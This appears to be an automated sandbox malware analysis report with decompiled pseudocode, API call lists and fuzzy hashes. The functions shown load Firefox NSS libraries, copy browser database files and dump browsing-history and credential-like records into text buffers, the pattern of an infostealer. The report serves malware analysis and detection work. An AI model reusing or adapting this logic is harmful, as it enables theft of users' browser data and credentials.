                                                                    • Instruction Fuzzy Hash: E6E16CB2901258EFDB14EB64CC85BDEB778AF49304F1041EAE509B7181DA749F88CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041067C Relevance: 22.9, APIs: 15, Instructions: 408stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E0041067C(char __ebx, CHAR* __edi, void* __esi, void* __eflags) {
				char* _t149;
				CHAR* _t150;
				signed char _t156;
				intOrPtr _t161;
				intOrPtr* _t168;
				void* _t183;
				void* _t185;
				void* _t187;
				intOrPtr _t189;
				intOrPtr* _t198;
				void* _t209;
				void* _t213;
				CHAR* _t214;
				CHAR* _t220;
				CHAR* _t224;
				void* _t239;
				void* _t271;
				intOrPtr _t300;
				intOrPtr _t301;
				intOrPtr _t303;
				intOrPtr _t304;
				intOrPtr _t306;
				intOrPtr _t307;
				intOrPtr _t309;
				intOrPtr _t310;
				void* _t312;
				void* _t313;
				void* _t314;
				void* _t315;
				CHAR* _t319;
				intOrPtr _t323;
				void* _t335;
				intOrPtr _t336;
				intOrPtr _t365;

				_t322 = __esi;
				_t319 = __edi;
				_t266 = __ebx;
				_push(0x2b4);
				E0042083E(E00434493, __ebx, __edi, __esi);
				_t271 = 0x104;
				_t149 = _t335 - 0x118;
				do {
					 *_t149 = 0;
					_t149 = _t149 + 1;
					_t271 = _t271 - 1;
				} while (_t271 != 0);
				_t150 = E00416617(__ebx, __edi, __esi, 0x28);
				lstrcatA(_t335 - 0x118, _t150);
				lstrcatA(_t335 - 0x118,  *0x445b94);
				_t156 = GetFileAttributesA(_t335 - 0x118);
				if(_t156 == 0xffffffff) {
					L44:
					return E00420888(_t266, _t319, _t322);
				}
				_t340 = _t156 & 0x00000010;
				if((_t156 & 0x00000010) != 0) {
					goto L44;
				}
				_push(_t335 - 0x118);
				_push(_t335 - 0x2c0);
				E00413B48(__ebx, __edi, __esi, _t340);
				_t266 = 0;
				 *(_t335 - 4) = 0;
				_t161 = 0xf;
				 *((intOrPtr*)(_t335 - 0x120)) = _t161;
				 *((intOrPtr*)(_t335 - 0x124)) = 0;
				 *((char*)(_t335 - 0x134)) = 0;
				_t323 = 0;
				 *((intOrPtr*)(_t335 - 0x190)) = _t161;
				 *((intOrPtr*)(_t335 - 0x194)) = 0;
				 *(_t335 - 0x1a4) = 0;
				 *((intOrPtr*)(_t335 - 0x174)) = _t161;
				 *((intOrPtr*)(_t335 - 0x178)) = 0;
				 *(_t335 - 0x188) = 0;
				 *((intOrPtr*)(_t335 - 0x158)) = _t161;
				 *((intOrPtr*)(_t335 - 0x15c)) = 0;
				 *(_t335 - 0x16c) = 0;
				 *((intOrPtr*)(_t335 - 0x13c)) = _t161;
				 *((intOrPtr*)(_t335 - 0x140)) = 0;
				 *(_t335 - 0x150) = 0;
				 *(_t335 - 4) = 5;
				_push(0xa);
				_push(_t335 +  *((intOrPtr*)( *((intOrPtr*)(_t335 - 0x2c0)) + 4)) - 0x2c0);
				_push(E00414754(0, _t272, __edi, 0, _t340) & 0x000000ff);
				_push(_t335 - 0x2c0);
				_t168 = E00414B0D(0, _t335 - 0x134, __edi, 0, _t340);
				_t278 =  *((intOrPtr*)( *_t168 + 4)) + _t168;
				asm("sbb eax, eax");
				if(( *((intOrPtr*)( *_t168 + 4)) + _t168 &  !( ~( *( *((intOrPtr*)( *_t168 + 4)) + _t168 + 0xc) & 0x00000006))) == 0) {
					L43:
					_t322 = 1;
					E00404354(_t335 - 0x150, 1, _t266);
					E00404354(_t335 - 0x16c, 1, _t266);
					E00404354(_t335 - 0x188, 1, _t266);
					E00404354(_t335 - 0x1a4, 1, _t266);
					E00404354(_t335 - 0x134, 1, _t266);
					 *(_t335 - 4) =  *(_t335 - 4) | 0xffffffff;
					E00413BE2(_t335 - 0x258, 1,  *(_t335 - 4));
					 *((intOrPtr*)(_t335 - 0x258)) = 0x43f2fc;
					E0041D1C9(_t335 - 0x258);
					goto L44;
				}
				while(1) {
					_t183 = E0040C00F(_t335 - 0x134,  *0x445b00, _t323 + 1);
					_t326 = _t183;
					_t319 = _t319 | 0xffffffff;
					if(_t183 != _t319) {
						E0040453E(_t335 - 0x134, _t266, 9);
						_t309 =  *((intOrPtr*)(_t335 - 0x134));
						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
							_t309 = _t335 - 0x134;
						}
						_t259 =  *((intOrPtr*)(_t335 - 0x124));
						_t315 = _t309 +  *((intOrPtr*)(_t335 - 0x124));
						_t310 =  *((intOrPtr*)(_t335 - 0x134));
						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
							_t310 = _t335 - 0x134;
						}
						E00413770(_t335 - 0x134, _t335 - 0x204, _t259 + _t310 + 0xfffffff9, _t315);
						_t278 = _t335 - 0x1a4;
						E0040440A(_t335 - 0x1a4, _t335 - 0x134, 0, _t319);
						_t266 = 0;
					}
					_t185 = E0040C00F(_t335 - 0x134,  *0x445d88, _t326 + 1);
					_t328 = _t185;
					if(_t185 != _t319) {
						E0040453E(_t335 - 0x134, _t266, 9);
						_t306 =  *((intOrPtr*)(_t335 - 0x134));
						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
							_t306 = _t335 - 0x134;
						}
						_t251 =  *((intOrPtr*)(_t335 - 0x124));
						_t314 = _t306 +  *((intOrPtr*)(_t335 - 0x124));
						_t307 =  *((intOrPtr*)(_t335 - 0x134));
						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
							_t307 = _t335 - 0x134;
						}
						E00413770(_t335 - 0x134, _t335 - 0x20c, _t251 + _t307 + 0xfffffff9, _t314);
						_t278 = _t335 - 0x188;
						E0040440A(_t335 - 0x188, _t335 - 0x134, 0, _t319);
						_t266 = 0;
					}
					_t187 = E0040C00F(_t335 - 0x134,  *0x445efc, _t328 + 1);
					_t330 = _t187;
					if(_t187 != _t319) {
						E0040453E(_t335 - 0x134, _t266, 9);
						_t303 =  *((intOrPtr*)(_t335 - 0x134));
						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
							_t303 = _t335 - 0x134;
						}
						_t243 =  *((intOrPtr*)(_t335 - 0x124));
						_t313 =  *((intOrPtr*)(_t335 - 0x124)) + _t303;
						_t304 =  *((intOrPtr*)(_t335 - 0x134));
						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
							_t304 = _t335 - 0x134;
						}
						E00413770(_t335 - 0x134, _t335 - 0x210, _t243 + _t304 + 0xfffffff9, _t313);
						_t278 = _t335 - 0x16c;
						E0040440A(_t335 - 0x16c, _t335 - 0x134, 0, _t319);
						_t266 = 0;
					}
					_t189 = E0040C00F(_t335 - 0x134,  *0x445f40, _t330 + 1);
					 *((intOrPtr*)(_t335 - 0x1fc)) = _t189;
					if(_t189 != _t319) {
						E0040453E(_t335 - 0x134, _t266, 0x1b);
						_t300 =  *((intOrPtr*)(_t335 - 0x134));
						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
							_t300 = _t335 - 0x134;
						}
						_t356 =  *((intOrPtr*)(_t335 - 0x120)) - 0x10;
						_t232 =  *((intOrPtr*)(_t335 - 0x124));
						_t312 =  *((intOrPtr*)(_t335 - 0x124)) + _t300;
						_t301 =  *((intOrPtr*)(_t335 - 0x134));
						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
							_t301 = _t335 - 0x134;
						}
						E00413770(_t335 - 0x134, _t335 - 0x208, _t232 + _t301 + 0xfffffff9, _t312);
						_t336 = _t336 - 0x1c;
						 *((intOrPtr*)(_t335 - 0x200)) = _t336;
						E00404778(_t336, _t335 - 0x134);
						_t239 = E00415C74(_t335 - 0x208, _t335 - 0x1f8, _t336, _t356);
						_t319 = _t335 - 0x150;
						 *(_t335 - 4) = 6;
						E004042ED(_t319, _t239);
						_t278 = _t335 - 0x1f8;
						 *(_t335 - 4) = 5;
						E00404354(_t335 - 0x1f8, 1, 0);
						_t266 = 0;
					}
					if(E0040C0F9( *((intOrPtr*)(_t335 - 0x194)), _t335 - 0x1a4, 0x43c8d8, _t266) != 0 && E0040C0F9( *((intOrPtr*)(_t335 - 0x178)), _t335 - 0x188, 0x43c8d8, _t266) != 0 && E0040C0F9( *((intOrPtr*)(_t335 - 0x15c)), _t335 - 0x16c, 0x43c8d8, _t266) != 0) {
						_t209 = E0040C0F9( *((intOrPtr*)(_t335 - 0x140)), _t335 - 0x150, 0x43c8d8, _t266);
						_t361 = _t209;
						if(_t209 != 0) {
							lstrcatA( *0x446250,  *0x446148);
							lstrcatA( *0x446250,  *0x446100);
							_push(":");
							_push(_t335 - 0x1c0);
							_t213 = E0040C233(_t266, _t335 - 0x1a4, 0x43c8d8, _t361);
							 *(_t335 - 4) = 7;
							_t214 = E0040D66C(_t213, _t213, _t335 - 0x1dc, _t335 - 0x188);
							_t336 = _t336 + 0x10;
							 *(_t335 - 4) = 8;
							if(_t214[0x14] >= 0x10) {
								_t214 =  *_t214;
							}
							lstrcatA( *0x446250, _t214);
							E00404354(_t335 - 0x1dc, 1, _t266);
							 *(_t335 - 4) = 5;
							E00404354(_t335 - 0x1c0, 1, _t266);
							_t319 = 0x43c8dc;
							lstrcatA( *0x446250, 0x43c8dc);
							lstrcatA( *0x446250,  *0x445c48);
							_t220 =  *(_t335 - 0x16c);
							if( *((intOrPtr*)(_t335 - 0x158)) < 0x10) {
								_t220 = _t335 - 0x16c;
							}
							lstrcatA( *0x446250, _t220);
							lstrcatA( *0x446250, _t319);
							lstrcatA( *0x446250,  *0x4460c4);
							_t364 =  *((intOrPtr*)(_t335 - 0x13c)) - 0x10;
							_t224 =  *(_t335 - 0x150);
							if( *((intOrPtr*)(_t335 - 0x13c)) < 0x10) {
								_t224 = _t335 - 0x150;
							}
							lstrcatA( *0x446250, _t224);
							lstrcatA( *0x446250, "\n\n");
							E00404396(_t335 - 0x1a4, _t364, 0x43c8d8, _t266);
							E00404396(_t335 - 0x188, _t364, 0x43c8d8, _t266);
							E00404396(_t335 - 0x16c, _t364, 0x43c8d8, _t266);
							_t278 = _t335 - 0x150;
							E00404396(_t335 - 0x150, _t364, 0x43c8d8, _t266);
							 *0x446230 =  *0x446230 + 1;
							_t365 =  *0x446230;
						}
					}
					_push(0xa);
					_push(_t335 +  *((intOrPtr*)( *((intOrPtr*)(_t335 - 0x2c0)) + 4)) - 0x2c0);
					_push(E00414754(_t266, _t278, _t319, 0x43c8d8, _t365) & 0x000000ff);
					_push(_t335 - 0x2c0);
					_t198 = E00414B0D(_t266, _t335 - 0x134, _t319, 0x43c8d8, _t365);
					_t278 =  *((intOrPtr*)( *_t198 + 4)) + _t198;
					asm("sbb eax, eax");
					if(( *((intOrPtr*)( *_t198 + 4)) + _t198 &  !( ~( *( *((intOrPtr*)( *_t198 + 4)) + _t198 + 0xc) & 0x00000006))) == 0) {
						goto L43;
					}
					_t323 =  *((intOrPtr*)(_t335 - 0x1fc));
				}
				goto L43;
			}





































                                                                    0x0041067c
                                                                    0x0041067c
                                                                    0x0041067c
                                                                    0x0041067c
                                                                    0x00410686
                                                                    0x0041068b
                                                                    0x00410690
                                                                    0x00410696
                                                                    0x00410696
                                                                    0x00410699
                                                                    0x0041069a
                                                                    0x0041069a
                                                                    0x0041069f
                                                                    0x004106ad
                                                                    0x004106c0
                                                                    0x004106cd
                                                                    0x004106d6
                                                                    0x00410ca2
                                                                    0x00410ca7
                                                                    0x00410ca7
                                                                    0x004106dc
                                                                    0x004106de
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004106ea
                                                                    0x004106f1
                                                                    0x004106f2
                                                                    0x004106f7
                                                                    0x004106fb
                                                                    0x004106fe
                                                                    0x004106ff
                                                                    0x00410705
                                                                    0x0041070b
                                                                    0x00410711
                                                                    0x00410713
                                                                    0x00410719
                                                                    0x0041071f
                                                                    0x00410725
                                                                    0x0041072b
                                                                    0x00410731
                                                                    0x00410737
                                                                    0x0041073d
                                                                    0x00410743
                                                                    0x00410749
                                                                    0x0041074f
                                                                    0x00410755
                                                                    0x0041075b
                                                                    0x00410768
                                                                    0x00410771
                                                                    0x0041077a
                                                                    0x00410781
                                                                    0x00410788
                                                                    0x00410794
                                                                    0x004107a0
                                                                    0x004107a6
                                                                    0x00410c38
                                                                    0x00410c3b
                                                                    0x00410c43
                                                                    0x00410c50
                                                                    0x00410c5d
                                                                    0x00410c6a
                                                                    0x00410c77
                                                                    0x00410c7c
                                                                    0x00410c86
                                                                    0x00410c92
                                                                    0x00410c9c
                                                                    0x00000000
                                                                    0x00410ca1
                                                                    0x004107b4
                                                                    0x004107c3
                                                                    0x004107c8
                                                                    0x004107ca
                                                                    0x004107cf
                                                                    0x004107da
                                                                    0x004107e6
                                                                    0x004107ec
                                                                    0x004107ee
                                                                    0x004107ee
                                                                    0x004107fb
                                                                    0x00410801
                                                                    0x00410804
                                                                    0x0041080a
                                                                    0x0041080c
                                                                    0x0041080c
                                                                    0x00410825
                                                                    0x00410834
                                                                    0x0041083a
                                                                    0x0041083f
                                                                    0x0041083f
                                                                    0x00410850
                                                                    0x00410855
                                                                    0x00410859
                                                                    0x00410864
                                                                    0x00410870
                                                                    0x00410876
                                                                    0x00410878
                                                                    0x00410878
                                                                    0x00410885
                                                                    0x0041088b
                                                                    0x0041088e
                                                                    0x00410894
                                                                    0x00410896
                                                                    0x00410896
                                                                    0x004108af
                                                                    0x004108be
                                                                    0x004108c4
                                                                    0x004108c9
                                                                    0x004108c9
                                                                    0x004108da
                                                                    0x004108df
                                                                    0x004108e3
                                                                    0x004108ee
                                                                    0x004108fa
                                                                    0x00410900
                                                                    0x00410902
                                                                    0x00410902
                                                                    0x0041090f
                                                                    0x00410915
                                                                    0x00410918
                                                                    0x0041091e
                                                                    0x00410920
                                                                    0x00410920
                                                                    0x00410939
                                                                    0x00410948
                                                                    0x0041094e
                                                                    0x00410953
                                                                    0x00410953
                                                                    0x00410964
                                                                    0x00410969
                                                                    0x00410971
                                                                    0x00410980
                                                                    0x0041098c
                                                                    0x00410992
                                                                    0x00410994
                                                                    0x00410994
                                                                    0x0041099a
                                                                    0x004109a1
                                                                    0x004109a7
                                                                    0x004109aa
                                                                    0x004109b0
                                                                    0x004109b2
                                                                    0x004109b2
                                                                    0x004109cb
                                                                    0x004109d0
                                                                    0x004109db
                                                                    0x004109e2
                                                                    0x004109ed
                                                                    0x004109f4
                                                                    0x004109fa
                                                                    0x004109fe
                                                                    0x00410a07
                                                                    0x00410a0d
                                                                    0x00410a11
                                                                    0x00410a16
                                                                    0x00410a16
                                                                    0x00410a32
                                                                    0x00410a7c
                                                                    0x00410a81
                                                                    0x00410a83
                                                                    0x00410a95
                                                                    0x00410aa7
                                                                    0x00410ab3
                                                                    0x00410ab8
                                                                    0x00410abf
                                                                    0x00410ad4
                                                                    0x00410ad8
                                                                    0x00410add
                                                                    0x00410ae0
                                                                    0x00410ae8
                                                                    0x00410aea
                                                                    0x00410aea
                                                                    0x00410af3
                                                                    0x00410b02
                                                                    0x00410b10
                                                                    0x00410b14
                                                                    0x00410b19
                                                                    0x00410b25
                                                                    0x00410b37
                                                                    0x00410b44
                                                                    0x00410b4a
                                                                    0x00410b4c
                                                                    0x00410b4c
                                                                    0x00410b59
                                                                    0x00410b66
                                                                    0x00410b78
                                                                    0x00410b7e
                                                                    0x00410b85
                                                                    0x00410b8b
                                                                    0x00410b8d
                                                                    0x00410b8d
                                                                    0x00410b9a
                                                                    0x00410bab
                                                                    0x00410bb9
                                                                    0x00410bc6
                                                                    0x00410bd3
                                                                    0x00410bda
                                                                    0x00410be0
                                                                    0x00410be5
                                                                    0x00410be5
                                                                    0x00410be5
                                                                    0x00410a83
                                                                    0x00410bf4
                                                                    0x00410bfd
                                                                    0x00410c06
                                                                    0x00410c0d
                                                                    0x00410c14
                                                                    0x00410c20
                                                                    0x00410c2c
                                                                    0x00410c32
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004107ae
                                                                    0x004107ae
                                                                    0x00000000

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00410686
                                                                    • lstrcatA.KERNEL32(?,00000000,000002B4,004135AD,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106AD
                                                                    • lstrcatA.KERNEL32(?), ref: 004106C0
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 004106CD
                                                                      • Part of subcall function 0040440A: std::_Xinvalid_argument.LIBCPMT ref: 00404424
                                                                      • Part of subcall function 0040453E: std::_Xinvalid_argument.LIBCPMT ref: 00404551
                                                                      • Part of subcall function 0040453E: _memmove.LIBCMT ref: 0040458C
                                                                    • lstrcatA.KERNEL32(0043C8D8,00000000,0043C8D8,00000000,0043C8D8,00000000,0043C8D8,00000000,00000001,00000000,?,00000001,?,00000001,?,0000000A), ref: 00410A95
                                                                    • lstrcatA.KERNEL32 ref: 00410AA7
                                                                    • lstrcatA.KERNEL32(00000000), ref: 00410AF3
                                                                    • lstrcatA.KERNEL32(0043C8DC,00000001,00000000,00000001,00000000), ref: 00410B25
                                                                    • lstrcatA.KERNEL32 ref: 00410B37
                                                                    • lstrcatA.KERNEL32(?), ref: 00410B59
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 00410B66
                                                                    • lstrcatA.KERNEL32 ref: 00410B78
                                                                    • lstrcatA.KERNEL32(?), ref: 00410B9A
                                                                    • lstrcatA.KERNEL32(0043EC3C), ref: 00410BAB
                                                                      • Part of subcall function 00404396: _memmove.LIBCMT ref: 004043E7
                                                                      • Part of subcall function 00414754: __EH_prolog3.LIBCMT ref: 0041475B
                                                                      • Part of subcall function 00414B0D: __EH_prolog3_catch.LIBCMT ref: 00414B14
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00410C9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Xinvalid_argument_memmovestd::_$AttributesFileH_prolog3H_prolog3_H_prolog3_catchIos_base_dtorstd::ios_base::_
                                                                    • String ID:
                                                                    • API String ID: 3833189730-0
                                                                    • Opcode ID: 65636018cc3ec7c083148f8f99303f23e5727c7612be57699a412aac3b354b41
                                                                    • Instruction ID: 3b3c47d6d2e68956d0805454a379188081003d6f486aa7feea72118526a2cbaf
                                                                    • Opcode Fuzzy Hash: 65636018cc3ec7c083148f8f99303f23e5727c7612be57699a412aac3b354b41
                                                                    • Instruction Fuzzy Hash: FDF139719011289FDB25EB65CD85FEAB778AF4A304F0001EAE109A7192DB746FC5CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040B63D Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E0040B63D(void* __ebx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t48;
				intOrPtr* _t52;
				intOrPtr* _t56;
				intOrPtr* _t60;
				intOrPtr* _t64;
				intOrPtr* _t68;
				void* _t121;
				intOrPtr _t123;

				_t107 = __edi;
				_push(0x3c);
				E0042083E(E00434D6B, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t121 - 0x34)) = 0xf;
				 *((intOrPtr*)(_t121 - 0x38)) = 0;
				 *((char*)(_t121 - 0x48)) = 0;
				E00404331(_t121 - 0x48,  *0x445fe0);
				 *((intOrPtr*)(_t121 - 4)) = 0;
				_t123 =  *0x4465fc; // 0x0
				if(_t123 == 0) {
					_push("\\vcruntime140.dll");
					_push(_t121 - 0x2c);
					_t48 = E0040C233(1, _t121 - 0x48, 0, _t123);
					 *((char*)(_t121 - 4)) = 1;
					_t124 =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
						_t48 =  *_t48;
					}
					E0040AC0F(1, _t48, 1);
					 *((char*)(_t121 - 4)) = 0;
					E00404354(_t121 - 0x2c, 1, 0);
					_push("\\softokn3.dll");
					_push(_t121 - 0x2c);
					_t52 = E0040C233(1, _t121 - 0x48, 0, _t124);
					 *((char*)(_t121 - 4)) = 2;
					_t125 =  *((intOrPtr*)(_t52 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t52 + 0x14)) >= 0x10) {
						_t52 =  *_t52;
					}
					E0040AC0F(1, _t52, 1);
					 *((char*)(_t121 - 4)) = 0;
					E00404354(_t121 - 0x2c, 1, 0);
					_push("\\nss3.dll");
					_push(_t121 - 0x2c);
					_t56 = E0040C233(1, _t121 - 0x48, 0, _t125);
					 *((char*)(_t121 - 4)) = 3;
					_t126 =  *((intOrPtr*)(_t56 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t56 + 0x14)) >= 0x10) {
						_t56 =  *_t56;
					}
					E0040AC0F(1, _t56, 1);
					 *((char*)(_t121 - 4)) = 0;
					E00404354(_t121 - 0x2c, 1, 0);
					_push("\\msvcp140.dll");
					_push(_t121 - 0x2c);
					_t60 = E0040C233(1, _t121 - 0x48, 0, _t126);
					 *((char*)(_t121 - 4)) = 4;
					_t127 =  *((intOrPtr*)(_t60 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t60 + 0x14)) >= 0x10) {
						_t60 =  *_t60;
					}
					E0040AC0F(1, _t60, 1);
					 *((char*)(_t121 - 4)) = 0;
					E00404354(_t121 - 0x2c, 1, 0);
					_push("\\mozglue.dll");
					_push(_t121 - 0x2c);
					_t64 = E0040C233(1, _t121 - 0x48, 0, _t127);
					 *((char*)(_t121 - 4)) = 5;
					_t128 =  *((intOrPtr*)(_t64 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t64 + 0x14)) >= 0x10) {
						_t64 =  *_t64;
					}
					E0040AC0F(1, _t64, 1);
					 *((char*)(_t121 - 4)) = 0;
					E00404354(_t121 - 0x2c, 1, 0);
					_push("\\freebl3.dll");
					_push(_t121 - 0x2c);
					_t68 = E0040C233(1, _t121 - 0x48, 0, _t128);
					 *((char*)(_t121 - 4)) = 6;
					if( *((intOrPtr*)(_t68 + 0x14)) >= 0x10) {
						_t68 =  *_t68;
					}
					_t107 = _t68;
					E0040AC0F(1, _t68, 1);
					E00404354(_t121 - 0x2c, 1, 0);
					 *0x4465fc = 1;
				}
				E00404354(_t121 - 0x48, 1, 0);
				return E00420888(1, _t107, 0);
			}











                                                                    0x0040b63d
                                                                    0x0040b63d
                                                                    0x0040b644
                                                                    0x0040b654
                                                                    0x0040b65b
                                                                    0x0040b65e
                                                                    0x0040b662
                                                                    0x0040b669
                                                                    0x0040b66d
                                                                    0x0040b673
                                                                    0x0040b67c
                                                                    0x0040b681
                                                                    0x0040b685
                                                                    0x0040b68c
                                                                    0x0040b68f
                                                                    0x0040b693
                                                                    0x0040b695
                                                                    0x0040b695
                                                                    0x0040b69f
                                                                    0x0040b6aa
                                                                    0x0040b6ae
                                                                    0x0040b6b6
                                                                    0x0040b6bb
                                                                    0x0040b6bf
                                                                    0x0040b6c6
                                                                    0x0040b6ca
                                                                    0x0040b6ce
                                                                    0x0040b6d0
                                                                    0x0040b6d0
                                                                    0x0040b6da
                                                                    0x0040b6e5
                                                                    0x0040b6e9
                                                                    0x0040b6f1
                                                                    0x0040b6f6
                                                                    0x0040b6fa
                                                                    0x0040b701
                                                                    0x0040b705
                                                                    0x0040b709
                                                                    0x0040b70b
                                                                    0x0040b70b
                                                                    0x0040b715
                                                                    0x0040b720
                                                                    0x0040b724
                                                                    0x0040b72c
                                                                    0x0040b731
                                                                    0x0040b735
                                                                    0x0040b73c
                                                                    0x0040b740
                                                                    0x0040b744
                                                                    0x0040b746
                                                                    0x0040b746
                                                                    0x0040b750
                                                                    0x0040b75b
                                                                    0x0040b75f
                                                                    0x0040b767
                                                                    0x0040b76c
                                                                    0x0040b770
                                                                    0x0040b777
                                                                    0x0040b77b
                                                                    0x0040b77f
                                                                    0x0040b781
                                                                    0x0040b781
                                                                    0x0040b78b
                                                                    0x0040b796
                                                                    0x0040b79a
                                                                    0x0040b7a2
                                                                    0x0040b7a7
                                                                    0x0040b7ab
                                                                    0x0040b7b2
                                                                    0x0040b7ba
                                                                    0x0040b7bc
                                                                    0x0040b7bc
                                                                    0x0040b7bf
                                                                    0x0040b7c6
                                                                    0x0040b7d1
                                                                    0x0040b7d6
                                                                    0x0040b7d6
                                                                    0x0040b7e1
                                                                    0x0040b7eb

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040B644
                                                                      • Part of subcall function 0040C233: __EH_prolog3.LIBCMT ref: 0040C23A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3H_prolog3_
                                                                    • String ID: \freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$freebl3.dll$mozglue.dll$msvcp140.dll$nss3.dll$softokn3.dll$vcruntime140.dll
                                                                    • API String ID: 3355343447-1404205017
                                                                    • Opcode ID: d57ff7226d1bc0613194851ebd95542abedc3ae522f5376bae662bb496100257
                                                                    • Instruction ID: 7bfe6ccb24835a4369a3d6b14c4e6b5a1dfccb5b404d9dbd553563100066fc49
                                                                    • Opcode Fuzzy Hash: d57ff7226d1bc0613194851ebd95542abedc3ae522f5376bae662bb496100257
                                                                    • Instruction Fuzzy Hash: 9451CF72805204AFDB08EBEAD445BCE7BB8DF49314F10507FE015B71D2DB785A85CAAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040F505 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 119stringmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 47%
                                                                    			E0040F505(CHAR* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t38;
				void* _t50;
				void* _t55;
				CHAR* _t62;
				void* _t76;
				signed int _t79;
				void* _t80;
				void* _t83;
				void* _t84;
				void* _t86;

				_t69 = __ebx;
				_t29 =  *0x443674; // 0x393162b1
				_v8 = _t29 ^ _t79;
				_v556 = _a4;
				_v552 = _a8;
				_t78 = 0x104;
				_v560 = _a12;
				E00426300( &_v276, 0, 0x104);
				lstrcatA( &_v276,  *0x445fe0);
				_t38 = 0x1a;
				lstrcatA( &_v276, E00415EF6(_t38, _t86));
				CopyFileA(__ebx,  &_v276, 1);
				E00426300( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v552, _v556);
				_t50 =  *0x446248( &_v276,  &_v548);
				_t83 = _t80 + 0x30;
				if(_t50 == 0) {
					_t55 =  *0x4461fc(_v548,  *0x445e30, 0xffffffff,  &_v544, 0);
					_t84 = _t83 + 0x14;
					if(_t55 == 0) {
						_t78 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
						while(1) {
							_push(_v544);
							if( *0x446218() != 0x64) {
								break;
							}
							 *0x446238(_v544, 0);
							_t62 =  *0x446238(_v544, 0);
							_t84 = _t84 + 0x10;
							lstrcatA(_t78, _t62);
							lstrcatA(_t78, 0x43c8dc);
						}
						E0041CE7C(_v560,  &_v540,  *0x446320(_t78), 3);
					}
					 *0x44621c(_v544);
					 *0x44624c(_v548);
				}
				return E0041DA9B(DeleteFileA( &_v276), _t69, _v8 ^ _t79, _t76, 0, _t78);
			}
























                                                                    0x0040f505
                                                                    0x0040f50e
                                                                    0x0040f515
                                                                    0x0040f51c
                                                                    0x0040f526
                                                                    0x0040f52f
                                                                    0x0040f535
                                                                    0x0040f545
                                                                    0x0040f55a
                                                                    0x0040f562
                                                                    0x0040f570
                                                                    0x0040f580
                                                                    0x0040f58f
                                                                    0x0040f5af
                                                                    0x0040f5c3
                                                                    0x0040f5c9
                                                                    0x0040f5ce
                                                                    0x0040f5ea
                                                                    0x0040f5f0
                                                                    0x0040f5f5
                                                                    0x0040f60a
                                                                    0x0040f63f
                                                                    0x0040f63f
                                                                    0x0040f64f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040f615
                                                                    0x0040f622
                                                                    0x0040f628
                                                                    0x0040f62d
                                                                    0x0040f639
                                                                    0x0040f639
                                                                    0x0040f66a
                                                                    0x0040f66f
                                                                    0x0040f678
                                                                    0x0040f685
                                                                    0x0040f68b
                                                                    0x0040f6a6

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040F545
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040F55A
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?), ref: 0040F570
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040F580
                                                                    • _memset.LIBCMT ref: 0040F58F
                                                                    • wsprintfA.USER32 ref: 0040F5AF
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040F5FD
